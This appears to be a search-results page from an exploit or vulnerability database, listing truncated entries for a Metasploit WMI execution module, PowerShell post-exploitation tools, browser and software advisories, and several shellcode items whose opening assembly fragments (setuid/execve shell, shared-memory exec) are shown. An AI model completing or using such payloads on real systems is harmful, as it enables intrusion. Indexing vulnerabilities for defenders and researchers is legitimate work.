75 matches found
WMI Authenticated Exec Via Powershell Authenticated Exploit
This Metasploit module uses WMI execution to launch a payload instance on a remote machine. In order to avoid AV detection, all execution is performed in memory via psh-net encoded payload. Persistence option can be set to keep the payload looping while a handler is present to receive it. By...
Microsoft Internet Explorer Memory Corruption (MS16-084: CVE-2016-3242)
A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects when processing HTML and script code. A remote attacker can exploit this issue by enticing a target victim to open a specially crafted web page that could...
PowerShell Runspace Portable Post Exploitation Tool: PowerOPS
PowerShell Runspace Portable Post Exploitation Tool aimed at making Penetration Testing with PowerShell “easier” PowerOPS is an application written in C that does not rely on powershell.exe but runs PowerShell commands and functions within a powershell runspace environment .NET. It intends to...
Run Binaries From Memory: Pazuzu
Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios. For example, if you want to exploit a vulnerability and run your ow...
SuSE 11.3 Security Update : Mozilla Firefox (SAT Patch Number 10524)
Mozilla Firefox was updated to the 31.5.3ESR release to fix two security vulnerabilities : - Security researcher ilxu1a reported, through HP Zero Day Initiative's Pwn2Own contest, a flaw in Mozilla's implementation of typed array bounds checking in JavaScript just-in-time compilation JIT and its...
IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 Multiple Vulnerabilities (2)
No description provided by source. source: http://www.securityfocus.com/bid/9512/info IBM Informix Dynamic Server and IBM Informix Extended Parallel Server have been reported prone to multiple vulnerabilities. The first issue exists in the onedcu binary. Specifically, when the binary is invoked a...
Firefox < 29.0 Multiple Vulnerabilities
The installed version of Firefox is a version prior to 29.0 and is, therefore, potentially affected by the following vulnerabilities : - An issue exists in the Network Security NSS library due to improper handling of IDNA domain prefixes for wildcard certificates. This issue could allow man-in-...
Novell GroupWise Client ActiveX SetEngine Pointer Manipulation
Added: 02/18/2013 CVE: CVE-2012-0439 BID: 57658 OSVDB: 89700 Background Novell GroupWise is an e-mail and collaboration product suite. Problem Several methods in the GroupWise ActiveX plugin do not validate user-supplied pointers that are passed as function arguments. This may allow an attacker t...
Multiple dangling pointer vulnerabilities — Mozilla
Security researcher regenrecht reported via TippingPoint's Zero Day Initiative two instances of code which modifies SVG element lists failed to account for changes made to the list by user-supplied callbacks before accessing list elements. If a user-supplied callback deleted such an object, the...
JITed stage-0 shellcode
No description provided by source. Title: JITed stage-0 shellcode Author: Alexey Sintsov Download N/A // JITS0.AS // // VirtualProtect stage-0 shellcode // // how to use stack // // 0000: 0x11111111 -- ret addr to JIT satge0 shellcode // 0004: 0x60616f62 -- pointer on string atom encoded high if...
JITed stage-0 shellcode
JITed stage-0 shellcode. Shellcode exploit for win32 platform Title: JITed stage-0 shellcode Author: Alexey Sintsov Download N/A // JITS0.AS // // VirtualProtect stage-0 shellcode // // how to use stack // // 0000: 0x11111111 -- ret addr to JIT satge0 shellcode // 0004: 0x60616f62 -- pointer on...
DeepBurner pro 1.9.0.228 - '.dbr' file Buffer Overflow (Universal)
/ Deepburner pro 1.9.0.228 dbr file buffer overflow exploituniversal This is buffer: header 253 bytes + junk+ next seh + seh addr + tail 957 bytes dbr/dbi file Date: 29.01.2010 Dicovery Credits: fl0 fl0w Exploit Credits : fl0 fl0w ?Download latest vuln vs from: http://www.deepburner.com/?r=downlo...
Design/Logic Flaw
The Java interface to CoreAudio on Apple Mac OS X 10.3.9 and 10.4.10 contains an unsafe interface that is exposed by JDirect, which allows remote attackers to free arbitrary memory and thereby execute arbitrary code...
linux/x86 setuid(0) and /bin/sh execve() shellcode 30 bytes
No description provided by source. / $Id: setuid-linux.c,v 1.4 2004/06/02 12:22:30 raptor Exp $ setuid-linux.c - setuid/execve shellcode for Linux/x86 Copyright c 2004 Marco Ivaldi [email protected] Short fully-functional setuid0 and /bin/sh execve shellcode. / / setuid0 8049380: 6a 17 push...
linux/x86 shared memory exec 50 bytes
linux/x86 shared memory exec 50 bytes. Shellcode exploit for linx86 platform / [email protected] - http://www.nopninjas.com Platform: Linux x86 Length: 50 bytes - This shellcode connects to the shared memory segment matching the key and executes the code at that address. xorl %edi,%edi xorl...